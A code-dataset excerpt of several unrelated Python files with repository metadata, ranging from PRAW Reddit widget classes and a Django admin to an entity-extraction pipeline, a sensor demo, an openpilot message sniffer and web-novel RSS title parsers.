        _data.setdefault(self.CHILD_ATTRIBUTE, [])
        super(RulesWidget, self).__init__(reddit, _data=_data)
class TextArea(Widget):
    """Class to represent a text area widget.

    Find a text area in a subreddit:

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       text_area = None
       for widget in widgets.sidebar:
           if isinstance(widget, praw.models.TextArea):
               text_area = widget
               break

       print(text_area.text)

    Create one (requires proper moderator permissions):

    .. code-block:: python

       widgets = reddit.subreddit('redditdev').widgets
       styles = {'backgroundColor': '#FFFF66', 'headerColor': '#3333EE'}
       text_area = widgets.mod.add_text_area('My cool title',
                                             '*Hello* **world**!',
                                             styles)

    For more information on creation, see :meth:`.add_text_area`.

    Update one (requires proper moderator permissions):

    .. code-block:: python

       new_styles = {'backgroundColor': '#FFFFFF', 'headerColor': '#FF9900'}
       text_area = text_area.mod.update(shortName='My fav text',
                                        styles=new_styles)

    Delete one (requires proper moderator permissions):

    .. code-block:: python

       text_area.mod.delete()

    **Typical Attributes**

    This table describes attributes that typically belong to objects of this
    class. Since attributes are dynamically provided (see
    :ref:`determine-available-attributes-of-an-object`), there is not a
    guarantee that these attributes will always be present, nor is this list
    comprehensive in any way.

    ======================= ===================================================
    Attribute               Description
    ======================= ===================================================
    ``id``                  The widget ID.
    ``kind``                The widget kind (always ``'textarea'``).
    ``shortName``           The short name of the widget.
    ``styles``              A ``dict`` with the keys ``'backgroundColor'`` and
                            ``'headerColor'``.
    ``subreddit``           The :class:`.Subreddit` the text area belongs
                            to.
    ``text``                The widget's text, as Markdown.
    ``textHtml``            The widget's text, as HTML.
    ======================= ===================================================
    """
class WidgetEncoder(JSONEncoder):
    """Class to encode widget-related objects."""

    def default(self, o):  # pylint: disable=E0202
        """Serialize ``PRAWBase`` objects.

        Non-``PRAWBase`` values are delegated to the base encoder; a
        ``PRAWBase`` is rendered as a dict of its public attributes.
        """
        if not isinstance(o, PRAWBase):
            return JSONEncoder.default(self, o)
        return {
            name: attribute
            for name, attribute in vars(o).items()
            if not name.startswith("_")
        }
class WidgetModeration(object):
    """Class for moderating a particular widget.

    Example usage:

    .. code-block:: python

       widget = reddit.subreddit('my_sub').widgets.sidebar[0]
       widget.mod.update(shortName='My new title')
       widget.mod.delete()
    """

    def __init__(self, widget, subreddit, reddit):
        """Initialize the widget moderation object."""
        self._reddit = reddit
        self._subreddit = subreddit
        self.widget = widget

    def delete(self):
        """Delete the widget.

        Example usage:

        .. code-block:: python

           widget.mod.delete()
        """
        route = API_PATH["widget_modify"].format(
            subreddit=self._subreddit, widget_id=self.widget.id
        )
        self._reddit.request("DELETE", route)

    def update(self, **kwargs):
        """Update the widget. Returns the updated widget.

        Parameters differ based on the type of widget. See
        `Reddit documentation
        <https://www.reddit.com/dev/api#PUT_api_widget_{widget_id}>`_ or the
        document of the particular type of widget.

        For example, update a text widget like so:

        .. code-block:: python

           text_widget.mod.update(shortName='New text area', text='Hello!')

        .. note::

           Most parameters follow the ``lowerCamelCase`` convention. When in
           doubt, check the Reddit documentation linked above.
        """
        route = API_PATH["widget_modify"].format(
            subreddit=self._subreddit, widget_id=self.widget.id
        )
        # Start from the widget's current public attributes, then overlay
        # the caller-supplied changes.
        payload = {
            name: attribute
            for name, attribute in vars(self.widget).items()
            if not name.startswith("_")
        }
        del payload["subreddit"]  # not JSON serializable
        payload.update(kwargs)
        updated = self._reddit.put(
            route, data={"json": dumps(payload, cls=WidgetEncoder)}
        )
        updated.subreddit = self._subreddit
        return updated
| [
"[email protected]"
]
| |
60e99e3c34a04fa47c76b65eeb7e6b16e810f619 | 9ed385053e7f28bfd0c6f186fc4963faac43eb96 | /store/admin.py | 242da77e1948b6798d3a5b94197f9a83ae85741d | []
| no_license | Pagante/greatkart-django | ffadfb5d4827220f3df588fb1d21dc28f1359ce0 | d4bb679c7fd270435f4ce0cc8854bdb3d2e134dd | refs/heads/main | 2023-05-12T01:07:53.092949 | 2021-05-30T16:34:07 | 2021-05-30T16:34:07 | 365,899,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 855 | py | from django.contrib import admin
from django.db import models
from .models import Product, Variation, reviewRating
# Register your models here.
class ProductAdmin(admin.ModelAdmin):
    """Admin options for the Product model."""

    # Columns shown in the product change-list view.
    list_display = ('id', 'product_name','price', 'stock', 'category','modified_date', 'is_available')
    # Pre-fill the slug field from the product name while typing in the form.
    prepopulated_fields = {'slug': ('product_name',)}
    # Columns that link through to the product edit page.
    list_display_links = ('id', 'product_name', 'price', 'stock')
class VariationAdmin(admin.ModelAdmin):
list_display = ('id','product', 'variation_category', 'variation_value' ,'is_active')
list_display_links = ('id','product', 'variation_category', 'variation_value' )
list_editable = ('is_active',)
list_filter = ('product', 'variation_category', 'variation_value' )
admin.site.register(Product, ProductAdmin)
admin.site.register(Variation, VariationAdmin)
admin.site.register(reviewRating) | [
"[email protected]"
]
| |
4095bae2f056ec0ad61e9b477a8afdbf75a69e26 | b9e5aebb49734ad47825130529bd64e59f690ecf | /chapter_3/greeting.py | 78fd31f144aa4c16e330ae31c4398f6ae86f6131 | []
| no_license | mikegirenko/python-learning | dab0f67d990d95035f93720986c84aaf422f7a9f | db9e3f0e3897caf703169d1f14b15a9aa1901161 | refs/heads/master | 2021-07-09T08:03:40.535653 | 2020-08-05T00:13:41 | 2020-08-05T00:13:41 | 169,983,732 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | my_friends = ['bob', 'dave', 'tom']
print('Hello, my first friend ' + my_friends[0].title())
print('Hello, my second friend ' + my_friends[1].title())
print('Hello, my last friend ' + my_friends[-1].title())
| [
"[email protected]"
]
| |
4bb54211b52f574fa2a23278d051229f519fd3cd | 5a74a3c8e40b902c8a6702a1ca4183770ba64f69 | /onesource/extract_entities.py | bf43c2865d76de6bbebbe6c3fba7028a2c58db52 | []
| no_license | markmo/onesource | 77e6b9234d2408c4f473823195897f9e0e328486 | b3e43dde6b527115035b89cdae0f42f5e4daa441 | refs/heads/master | 2021-04-03T04:44:11.110450 | 2019-05-19T06:12:45 | 2019-05-19T06:12:45 | 125,161,967 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,809 | py | import csv
from datetime import datetime
from dateutil.parser import parse
from duckling import DucklingWrapper
from flair.data import Sentence
from flair.models import SequenceTagger
from flashtext import KeywordProcessor
import json
from logging import Logger
import os
from pathlib import Path
from pipeline import AbstractStep, file_iter, json_output_handler as oh
import re
from typing import Any, AnyStr, Callable, Dict, Iterator, IO, List, Tuple
from utils import convert_name_to_underscore
ENTITY_DATE = 'date'
ENTITY_NUMBER = 'number'
ENTITY_PERSON = 'person'
ENABLED_SYSTEM_ENTITIES = {ENTITY_DATE, ENTITY_NUMBER, ENTITY_PERSON}
class ExtractEntitiesStep(AbstractStep):
    """
    Extract entities from collected text.

    Combines three matching strategies per text block: configured keyword
    synonyms (flashtext), configured regular expressions, and system
    entities (duckling for dates/numbers, flair NER for people), then
    prunes overlapping and spurious spans before writing the result.
    """
    def __init__(self,
                 name: str,
                 source_key: str = None,
                 overwrite: bool = False,
                 source_iter: Callable[[List[str]], Iterator[IO[AnyStr]]] = file_iter,
                 output_handler: Callable[[str, Dict[str, Any]], None] = oh):
        super().__init__(name, source_key, overwrite)
        self.__source_iter = source_iter
        self.__output_handler = output_handler
        # Entity definitions live next to the package in config/entities.csv.
        root_path = Path(__file__).parent.parent
        entities_path = str(root_path / 'config/entities.csv')
        self.entity_reverse_lookup, synonyms, self.regexprs = load_entities(entities_path)
        self.keyword_processor = prepare_keyword_processor(synonyms)
        # Only load the heavyweight duckling / flair models if an entity
        # type that needs them is actually enabled.
        duckling_entities = {ENTITY_DATE, ENTITY_NUMBER}
        tagger_entities = {ENTITY_PERSON}
        if len(duckling_entities.intersection(ENABLED_SYSTEM_ENTITIES)) > 0:
            self.d = DucklingWrapper()
        if len(tagger_entities.intersection(ENABLED_SYSTEM_ENTITIES)) > 0:
            self.tagger = SequenceTagger.load('ner')
    def process_file(self,
                     file: IO[AnyStr],
                     path: str,
                     control_data: Dict[str, Any],
                     logger: Logger,
                     accumulator: Dict[str, Any]
                     ) -> None:
        """Extract entities from one collected-text JSON file and write the
        annotated output; records the output file in ``accumulator``."""
        logger.debug('process file: {}'.format(file.name))
        input_doc = json.load(file)
        metadata = input_doc['metadata']
        record_id = metadata['record_id']
        data = input_doc['data']
        text = data['text']
        nlp_text = []
        for t in text:
            entities = []
            # 1) dictionary/synonym matches (span_info gives (value, start, end))
            keywords_found = self.keyword_processor.extract_keywords(t, span_info=True)
            for keyword in keywords_found:
                entities.append({
                    'entity': self.entity_reverse_lookup[keyword[0]],
                    'location': keyword[1:],
                    'value': keyword[0],
                    'confidence': 1.0
                })
            # 2) configured regular-expression matches
            matches = match_regexprs(t, self.regexprs)
            for match in matches:
                match['entity'] = self.entity_reverse_lookup[match['value']]
            entities.extend(matches)
            # 3) system entities (dates, numbers, people)
            entities.extend(self.match_system_entities(t))
            # is the span of an entity contained within the span
            # of another entity
            def is_contained(entity):
                start, end = entity['location']
                for ent in entities:
                    s, e = ent['location']
                    # exclude exact span matches
                    if (start == s and end < e) or (start > s and end == e) or (start > s and end < e):
                        return True
                return False
            def is_valid(entity):
                # remove spurious dates
                if entity['entity'] == 'sys-date':
                    start, end = entity['location']
                    # very short spans ("May", "1st") are almost never real dates
                    if (end - start) < 8:
                        return False
                    value = entity['value']
                    if isinstance(value, str):
                        try:
                            date = parse(value)
                        except ValueError:
                            return False
                        # NOTE(review): hard-coded plausible year window — revisit after 2025
                        year = date.year
                        if year < 1990 or year > 2025:
                            return False
                return True
            # keep the entity with the longest span where an entity
            # is contained within the span of another
            pruned_entities = [ent for ent in entities if not is_contained(ent) and is_valid(ent)]
            nlp_text.append({
                'text': t,
                'entities': pruned_entities
            })
        now = datetime.utcnow().isoformat()
        write_root_dir = control_data['job']['write_root_dir']
        step_name = convert_name_to_underscore(self.name)
        output_filename = '{}_{}.json'.format(step_name, record_id)
        output_path = os.path.join(write_root_dir, step_name, output_filename)
        # rebind `data`: output carries only the annotated text, not the input payload
        data = {}
        data['nlp_text'] = nlp_text
        content = {'metadata': metadata, 'data': data}
        accumulator['files_output'].append({
            'filename': output_filename,
            'input': path,
            'path': output_path,
            'status': 'processed',
            'time': now
        })
        self.__output_handler(output_path, content)
    def run(self, control_data: Dict[str, Any], logger: Logger, accumulator: Dict[str, Any]) -> None:
        """Process every source file, skipping those already marked
        'processed' in ``control_data`` unless overwrite is set."""
        file_paths = [x['path'] for x in control_data[self.source_key]]
        step_name = convert_name_to_underscore(self.name)
        processed_file_paths = {}
        if step_name in control_data:
            for x in control_data[step_name]:
                if x['status'] == 'processed':
                    processed_file_paths[x['input']] = x
        for file, path in self.__source_iter(file_paths):
            if not self._overwrite and path in processed_file_paths.keys():
                # already done on a previous run — keep the old record
                accumulator['files_output'].append(processed_file_paths[path])
                continue
            self.process_file(file, path, control_data, logger, accumulator)
    def match_system_entities(self, utter):
        """Return duckling date/number and flair person matches for ``utter``."""
        matches = []
        if ENTITY_DATE in ENABLED_SYSTEM_ENTITIES:
            results = self.d.parse_time(utter)
            for result in results:
                matches.append({
                    'entity': 'sys-date',
                    'location': [result['start'], result['end']],
                    'value': result['value']['value'],
                    'confidence': 1.0
                })
        if ENTITY_NUMBER in ENABLED_SYSTEM_ENTITIES:
            results = self.d.parse_number(utter)
            for result in results:
                matches.append({
                    'entity': 'sys-number',
                    'location': [result['start'], result['end']],
                    'value': result['value']['value'],
                    'confidence': 1.0
                })
        # Sentence is built lazily so the tokenization cost is only paid
        # when a tagger-backed entity type is enabled.
        sentence = None
        if ENTITY_PERSON in ENABLED_SYSTEM_ENTITIES:
            if sentence is None:
                sentence = Sentence(utter)
            self.tagger.predict(sentence)
            for entity in sentence.get_spans('ner'):
                if entity.tag == 'PER':
                    matches.append({
                        'entity': 'sys-person',
                        'location': [entity.start_pos, entity.end_pos],
                        'value': entity.text,
                        'confidence': entity.score
                    })
        return matches
def load_entities(file_path: str) -> Tuple[Dict[str, str], Dict[str, list], Dict[str, list]]:
    """Load entity definitions from a CSV configuration file.

    Each row is ``entity_name, entity_value[, synonyms-or-regex]`` where the
    third column is either a comma-separated synonym list or one or more
    ``/.../`` regular expressions. An ``entity_value`` of ``__sys`` is kept
    out of the reverse lookup (it denotes a system entity).

    :param file_path: path to the entities CSV file
    :return: (value -> entity-name reverse lookup,
              value -> synonym list,
              value -> regular-expression list)
    """
    entity_reverse_lookup = {}
    synonyms = {}
    regexprs = {}
    with open(file_path, 'r') as f:
        reader = csv.reader(f)
        for row in reader:
            if len(row) < 2:
                continue  # entity specification incomplete
            row = [x.strip() for x in row]  # strip any whitespace around cell values
            entity_name = row[0]
            entity_value = row[1]
            if entity_value != '__sys':
                entity_reverse_lookup[entity_value] = entity_name
            if len(row) > 2 and row[2].startswith('/'):
                # A regular expr; strip start and end '/.../' markers
                values = re.split(r'/\s*,\s*/', row[2][1:-1])
                regexprs[entity_value] = values
            elif len(row) > 2 and row[2]:
                # A synonym list; include the entity_value itself
                values = [entity_value, *re.split(r'\s*,\s*', row[2])]
                synonyms[entity_value] = values
            else:
                # BUGFIX: a two-column row used to raise IndexError here, and
                # an empty third column produced a spurious '' synonym. The
                # value is now its own only synonym in both cases.
                synonyms[entity_value] = [entity_value]
    return entity_reverse_lookup, synonyms, regexprs
def match_regexprs(utter: str, regexprs: Dict[str, list]) -> List[Dict[str, Any]]:
    """Run every configured regular expression over ``utter``.

    :param utter: text to scan
    :param regexprs: entity value -> list of regex patterns
    :return: one entity dict per match, carrying the whole-match span
             ('group_0') plus the span of every capture group
    """
    found = []
    for entity_value, patterns in regexprs.items():
        for pattern in patterns:
            for m in re.finditer(pattern, utter):
                # group_0 is the full match; numbered groups follow.
                groups = [{
                    'group': 'group_0',
                    'location': list(m.span())
                }]
                for idx, _ in enumerate(m.groups(), start=1):
                    groups.append({
                        'group': 'group_{}'.format(idx),
                        'location': list(m.span(idx))
                    })
                found.append({
                    'location': list(m.span()),
                    'value': entity_value,
                    'confidence': 1.0,
                    'groups': groups
                })
    return found
def prepare_keyword_processor(synonyms: Dict[str, list]) -> KeywordProcessor:
    """
    Build a flashtext KeywordProcessor from the synonym table.

    28x faster than a compiled regexp for 1,000 keywords
    https://github.com/vi3k6i5/flashtext

    :param synonyms: dict of entity synonyms (canonical value -> synonym list)
    :return: case-sensitive KeywordProcessor ready for extract_keywords()
    """
    kp = KeywordProcessor(case_sensitive=True)
    kp.add_keywords_from_dict(synonyms)
    return kp
| [
"[email protected]"
]
| |
2670eb26885abb954a926b8bbdf67cab549a0831 | 9da8754002fa402ad8e6f25659978bd269bbcec8 | /src/74A/cdf_74A.py | e07ce0c876f071bb2b46f0dfd4a3368160518a56 | [
"MIT"
]
| permissive | kopok2/CodeforcesSolutionsPython | a00f706dbf368ba0846c8ae86d4145b5dd3e1613 | 35bec0dbcff47765b123b5fe60476014376153df | refs/heads/master | 2023-02-02T03:08:22.097651 | 2020-12-17T22:00:50 | 2020-12-17T22:00:50 | 196,035,812 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | from operator import itemgetter
class CodeforcesTask74ASolution:
    """Solution for Codeforces problem 74A ("Room Leader").

    Each participant row is: handle, successful hacks, unsuccessful hacks,
    then the points for the five problems. Score = +100 per successful
    hack, -50 per unsuccessful hack, plus the problem points.
    """

    def __init__(self):
        self.result = ''
        self.n = 0
        self.participants = []

    def read_input(self):
        """Read participant count then one whitespace-separated row each."""
        self.n = int(input())
        for _ in range(self.n):
            self.participants.append(input().split(" "))

    def process_task(self):
        """Score every participant and store the leader's handle."""
        scores = []
        for part in self.participants:
            score = int(part[1]) * 100 - int(part[2]) * 50
            # BUGFIX: problem points start at index 3. The original summed
            # part[2:], which double-counted the unsuccessful-hack count.
            score += sum(int(x) for x in part[3:])
            scores.append((part[0], score))
        scores.sort(reverse=True, key=itemgetter(1))
        self.result = scores[0][0]

    def get_result(self):
        """Return the winning handle computed by process_task()."""
        return self.result


if __name__ == "__main__":
    Solution = CodeforcesTask74ASolution()
    Solution.read_input()
    Solution.process_task()
    print(Solution.get_result())
| [
"[email protected]"
]
| |
aed45e56c7dc367acf8f001535bbe48a7d4e1b21 | 6841f44b102572978b67af7b9fba9db03f75a6c3 | /cravattdb/contrib/residue_number_annotation/__init__.py | d74359f210fd5f30cb7a1134f916ebcb18581c7f | []
| no_license | radusuciu/cravattdb | 69fae8c30a94774420024ad4b90c285bc9c2c64c | bc4b2a147a374eed2e9350e824df85ba2108fca9 | refs/heads/master | 2021-06-06T08:29:41.824284 | 2016-10-21T21:57:13 | 2016-10-21T21:57:13 | 65,228,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,980 | py | """Blergh."""
from cravattdb.contrib.residue_number_annotation import uniprot
from urllib.parse import urlparse
from functools import partial
import ftplib
import pathlib
import gzip
SWISSPROT_URL = urlparse(
'ftp://ftp.uniprot.org/pub/databases/uniprot/current_release/knowledgebase/taxonomic_divisions/uniprot_sprot_human.dat.gz'
)
ABS_PATH = pathlib.Path(__file__).parents[0]
SWISSPROT_DAT = pathlib.Path(ABS_PATH, 'data/uniprot_sprot_human.dat')
DATA_PATH = pathlib.Path(ABS_PATH, 'data/uniprot.json')
def get_residue_number(experiment_type):
    """Return a residue-number lookup callable for the experiment type.

    Only 'isotop' experiments are supported; any other type yields None.
    The returned callable is ``_get_residue_number`` pre-bound to a
    uniprot db handle.
    """
    if experiment_type != 'isotop':
        return None
    return partial(_get_residue_number, db=get_db())
def _get_residue_number(uniprot_id, peptide, db=None):
    """Return residue number for labeled cysteine in a given protein.

    Best-effort: returns None when the lookup fails for any reason.

    :param uniprot_id: uniprot accession of the protein
    :param peptide: peptide sequence to locate
    :param db: uniprot db handle; loaded via get_db() when not supplied
    """
    if not db:
        db = get_db()
    try:
        return uniprot.get_residue_number(db, uniprot_id, peptide)
    except Exception:
        # BUGFIX: was a bare ``except`` with ``finally: return`` — that also
        # swallowed SystemExit/KeyboardInterrupt. Lookup failures still
        # deliberately yield None.
        return None
def get_db():
    """Get a handle to uniprot db, downloading if necessary."""
    # Only download when neither the parsed JSON nor the raw .dat exist.
    if not DATA_PATH.exists() and not SWISSPROT_DAT.exists():
        download_database()
    db = uniprot.init(
        data_path=str(DATA_PATH),
        input_data_path=str(SWISSPROT_DAT)
    )
    # Intended to delete the large download artifacts (currently a no-op).
    cleanup_database_files()
    return db
def download_database():
    """Download the gzipped SwissProt human .dat over FTP and decompress it.

    Fetches SWISSPROT_URL into data/, then unpacks it to SWISSPROT_DAT.
    """
    # heard you like context managers
    db_path = pathlib.Path(SWISSPROT_URL.path)
    archive_path = pathlib.Path('data', db_path.name)

    with ftplib.FTP(SWISSPROT_URL.netloc) as ftp:
        ftp.login()
        ftp.cwd(str(db_path.parent))
        retr_command = 'RETR {}'.format(str(db_path.name))
        # BUGFIX: the destination file was opened inline and never closed;
        # use a context manager so it is flushed and closed before reading.
        with open(str(archive_path), 'wb') as archive:
            ftp.retrbinary(retr_command, archive.write)

    with gzip.open(str(archive_path), 'r') as z:
        with open(str(SWISSPROT_DAT), 'wb') as f:
            f.writelines(z)
def cleanup_database_files():
    """If there are any giant downloaded files, delete them."""
    # TODO: not implemented yet — download artifacts are left on disk.
    pass
| [
"[email protected]"
]
| |
7dedc777e0e8c11ea0c28aa6c6a08bd4e0d6cf3f | 2bcc421ee345b00cf805c543b37d18b5d019dc04 | /adafruit-circuitpython-bundle-6.x-mpy-20201126/examples/bno08x_simpletest.py | 7be292ef80153375b4ff5a7b2baf3d3e200f97f0 | []
| no_license | saewoonam/sc-current-source-titano | 5a1ad46889c1b09c168424901fd71cb4eab5c61b | 1c136aa8b61268d9ac0b5a682b30ece70ab87663 | refs/heads/main | 2023-03-02T22:12:26.685537 | 2021-02-09T03:28:01 | 2021-02-09T03:28:01 | 317,299,900 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,477 | py | # SPDX-FileCopyrightText: 2020 Bryan Siepert, written for Adafruit Industries
#
# SPDX-License-Identifier: Unlicense
import time
import board
import busio
from adafruit_bno08x import (
BNO_REPORT_ACCELEROMETER,
BNO_REPORT_GYROSCOPE,
BNO_REPORT_MAGNETOMETER,
BNO_REPORT_ROTATION_VECTOR,
)
from adafruit_bno08x.i2c import BNO08X_I2C
# Open the I2C bus at 800 kHz and attach the BNO08x IMU driver.
i2c = busio.I2C(board.SCL, board.SDA, frequency=800000)
bno = BNO08X_I2C(i2c)
# Enable each report type that the loop below reads.
bno.enable_feature(BNO_REPORT_ACCELEROMETER)
bno.enable_feature(BNO_REPORT_GYROSCOPE)
bno.enable_feature(BNO_REPORT_MAGNETOMETER)
bno.enable_feature(BNO_REPORT_ROTATION_VECTOR)
# Poll the sensor twice a second and print each reading.
while True:
    time.sleep(0.5)
    print("Acceleration:")
    accel_x, accel_y, accel_z = bno.acceleration  # pylint:disable=no-member
    print("X: %0.6f Y: %0.6f Z: %0.6f m/s^2" % (accel_x, accel_y, accel_z))
    print("")
    print("Gyro:")
    gyro_x, gyro_y, gyro_z = bno.gyro  # pylint:disable=no-member
    print("X: %0.6f Y: %0.6f Z: %0.6f rads/s" % (gyro_x, gyro_y, gyro_z))
    print("")
    print("Magnetometer:")
    mag_x, mag_y, mag_z = bno.magnetic  # pylint:disable=no-member
    print("X: %0.6f Y: %0.6f Z: %0.6f uT" % (mag_x, mag_y, mag_z))
    print("")
    print("Rotation Vector Quaternion:")
    quat_i, quat_j, quat_k, quat_real = bno.quaternion  # pylint:disable=no-member
    print(
        "I: %0.6f J: %0.6f K: %0.6f Real: %0.6f" % (quat_i, quat_j, quat_k, quat_real)
    )
    print("")
| [
"[email protected]"
]
| |
95fcf4a17f0202eed8705013ffc615e1f1de0c74 | 7ef01829aca4b92687780d45745f62ca33480bc1 | /selfdrive/debug/dump.py | 89dd43fa4ce002a291378926b2c0b45a34ec58a6 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
]
| permissive | Jamezz/openpilot | 25392231ff229dc3dd360fa6bf782326d962496f | 5272c6b18e56a7124a56d2c2f6d8a7d7b2d4ac10 | refs/heads/volt | 2020-03-08T06:59:47.872585 | 2018-03-27T04:40:15 | 2018-03-27T04:40:15 | 127,984,350 | 0 | 0 | MIT | 2018-05-15T15:02:00 | 2018-04-04T00:25:52 | C | UTF-8 | Python | false | false | 2,576 | py | #!/usr/bin/env python
import sys
import argparse
import zmq
import json
from hexdump import hexdump
from threading import Thread
from cereal import log
import selfdrive.messaging as messaging
from selfdrive.services import service_list
def run_server(socketio):
    # Blocking Flask-SocketIO server used by the --map live view.
    socketio.run(app, host='0.0.0.0', port=4000)
if __name__ == "__main__":
    # NOTE: this script is Python 2 (bare print statements below).
    context = zmq.Context()
    poller = zmq.Poller()
    parser = argparse.ArgumentParser(description='Sniff a communcation socket')
    parser.add_argument('--pipe', action='store_true')
    parser.add_argument('--raw', action='store_true')
    parser.add_argument('--json', action='store_true')
    parser.add_argument('--dump-json', action='store_true')
    parser.add_argument('--no-print', action='store_true')
    parser.add_argument('--proxy', action='store_true', help='republish on localhost')
    parser.add_argument('--map', action='store_true')
    parser.add_argument('--addr', default='127.0.0.1')
    parser.add_argument("socket", type=str, nargs='*', help="socket name")
    args = parser.parse_args()
    republish_socks = {}
    # Subscribe to each requested service (by name or raw port number);
    # with no arguments, subscribe to every known service.
    for m in args.socket if len(args.socket) > 0 else service_list:
        if m in service_list:
            port = service_list[m].port
        elif m.isdigit():
            port = int(m)
        else:
            print("service not found")
            exit(-1)
        sock = messaging.sub_sock(context, port, poller, addr=args.addr)
        if args.proxy:
            # --proxy: re-publish every received message on localhost.
            republish_socks[sock] = messaging.pub_sock(context, port)
    if args.map:
        # Lazy imports: flask is only required for the map view.
        from flask.ext.socketio import SocketIO
        from flask import Flask
        app = Flask(__name__)
        socketio = SocketIO(app, async_mode='threading')
        server_thread = Thread(target=run_server, args=(socketio,))
        server_thread.daemon = True
        server_thread.start()
        print 'server running'
    # Main poll loop: receive, optionally republish, then print in the
    # format selected by the CLI flags.
    while 1:
        polld = poller.poll(timeout=1000)
        for sock, mode in polld:
            if mode != zmq.POLLIN:
                continue
            msg = sock.recv()
            evt = log.Event.from_bytes(msg)
            if sock in republish_socks:
                republish_socks[sock].send(msg)
            if args.map and evt.which() == 'liveLocation':
                print 'send loc'
                socketio.emit('location', {
                    'lat': evt.liveLocation.lat,
                    'lon': evt.liveLocation.lon,
                    'alt': evt.liveLocation.alt,
                })
            if not args.no_print:
                if args.pipe:
                    # raw bytes straight to stdout (for piping)
                    sys.stdout.write(msg)
                    sys.stdout.flush()
                elif args.raw:
                    hexdump(msg)
                elif args.json:
                    print(json.loads(msg))
                elif args.dump_json:
                    print json.dumps(evt.to_dict())
                else:
                    print evt
"[email protected]"
]
| |
316e6ad857cdf28a96fb109dab5fd55ee601abab | f20516958c39123f204e2bc442c91df7df1cc34a | /WebMirror/OutputFilters/rss/ParserFuncs_o_u.py | c43a9dddcb91153d5e3e615a7e44a15e4cb188a3 | [
"BSD-3-Clause"
]
| permissive | bradparks/ReadableWebProxy | 3c2732cff64007afa8318b5b159616a529068322 | 81fbce3083471126942d2e2a298dba9eaf1092b1 | refs/heads/master | 2020-05-29T11:48:40.189530 | 2016-08-25T15:17:14 | 2016-08-25T15:17:14 | 66,568,996 | 0 | 0 | null | 2016-08-25T15:13:39 | 2016-08-25T15:13:39 | null | UTF-8 | Python | false | false | 138,569 | py |
# pylint: disable=C0112,R0911,R0912,W0612
from WebMirror.OutputFilters.util.MessageConstructors import buildReleaseMessage
from WebMirror.OutputFilters.util.TitleParsers import extractChapterVol
from WebMirror.OutputFilters.util.TitleParsers import extractChapterVolFragment
from WebMirror.OutputFilters.util.TitleParsers import extractVolChapterFragmentPostfix
import re
####################################################################################################################################################
def extractSousetsuka(item):
    '''
    Parser for releases from the Sousetsuka translation group
    (Death March kara Hajimaru Isekai Kyousoukyoku).
    '''
    title = item['title']
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
    if "preview" in title.lower() or not (chp or vol):
        return False
    is_desumachi = ('Desumachi' in item['tags']
                    or 'Death March kara Hajimaru Isekai Kyousoukyoku' in title)
    if not is_desumachi:
        return False
    if not vol:
        # Titles like "... Kyousoukyoku 12-3" encode volume-chapter directly.
        extract = re.search(r'Kyousoukyoku (\d+)\-(\d+)', title)
        if extract:
            vol = int(extract.group(1))
            chp = int(extract.group(2))
    return buildReleaseMessage(item, "Death March kara Hajimaru Isekai Kyousoukyoku", vol, chp, frag=frag, postfix=postfix)
####################################################################################################################################################
def extractSpiritGodShura(item):
    '''
    Parser for 'Spirit God Shura' (OEL) releases.
    '''
    title = item['title']
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
    if "preview" in title.lower() or not (chp or vol):
        return False
    if not (title.startswith("Chapter") and item['tags'] == ['Chapters']):
        return False
    # Fall back to the text after the colon as the chapter postfix.
    if not postfix and ":" in title:
        postfix = title.split(":")[-1]
    return buildReleaseMessage(item, 'Spirit God Shura', vol, chp, postfix=postfix, tl_type='oel')
####################################################################################################################################################
def extractOniichanyamete(item):
    '''
    お兄ちゃん、やめてぇ! / Onii-chan Yamete

    Multi-series parser; routes by tag/title substrings, first match wins.
    '''
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or "preview" in item['title'].lower():
        return False
    if 'Jashin Average' in item['title'] \
            or 'Cthulhu Average' in item['title'] \
            or 'Evil God Average' in item['tags'] \
            or 'jashin' in item['tags']:
        return buildReleaseMessage(item, 'Evil God Average', vol, chp, frag=frag, postfix=postfix)
    if 'Haunted' in item['tags']:
        return buildReleaseMessage(item, 'Haunted Duke’s Daughter', vol, chp, postfix=postfix)
    if 'Tilea’s Worries' in item['title']:
        return buildReleaseMessage(item, 'Tilea\'s Worries', vol, chp, postfix=postfix)
    # Tilea arcs carry no volume number in the title; infer it from the arc name.
    if 'Tilea' in item['tags'] and 'Raid on the Capital' in item['title'] and not vol:
        return buildReleaseMessage(item, 'Tilea\'s Worries', 2, chp, postfix=postfix)
    if 'Tilea' in item['tags'] and 'Turf War' in item['title'] and not vol:
        return buildReleaseMessage(item, 'Tilea\'s Worries', 3, chp, postfix=postfix)
    if 'Kenkyo Kenjitu' in item['tags'] or 'Reika-sama' in item['title']:
        return buildReleaseMessage(item, 'Kenkyo Kenjitu', vol, chp, postfix=postfix)
    if 'My Sister the Heroine and I the Villainess' in item['tags']:
        return buildReleaseMessage(item, 'My Sister the Heroine, and I the Villainess', vol, chp, postfix=postfix)
    if 'Vampire Nap' in item['tags']:
        return buildReleaseMessage(item, 'The Reincarnated Vampire Wants an Afternoon Nap', vol, chp, postfix=postfix)
    if 'The Bathroom Goddess' in item['tags']:
        return buildReleaseMessage(item, 'The Bathroom Goddess', vol, chp, postfix=postfix)
    if 'a wild boss appeared' in item['tags']:
        return buildReleaseMessage(item, 'A Wild Boss Appeared', vol, chp, postfix=postfix)
    if 'The Girl Who Bore the Flame Ring' in item['tags']:
        return buildReleaseMessage(item, 'The Girl Who Bore the Flame Ring', vol, chp, postfix=postfix)
    if 'Debt Girl' in item['tags']:
        return buildReleaseMessage(item, 'The Noble Girl Living in Debt', vol, chp, postfix=postfix)
    if 'I’m Back in the Other World' in item['title']:
        return buildReleaseMessage(item, 'I\'m Back in the Other World', vol, chp)
    if 'Kazuha Axeplant’s Third Adventure:' in item['title']:
        return buildReleaseMessage(item, 'Kazuha Axeplant\'s Third Adventure', vol, chp)
    if "I'm the Final Boss!?" in item['tags']:
        return buildReleaseMessage(item, "I'm the Final Boss!?", vol, chp, tl_type='oel')
    if 'Tiger Story' in item['tags']:
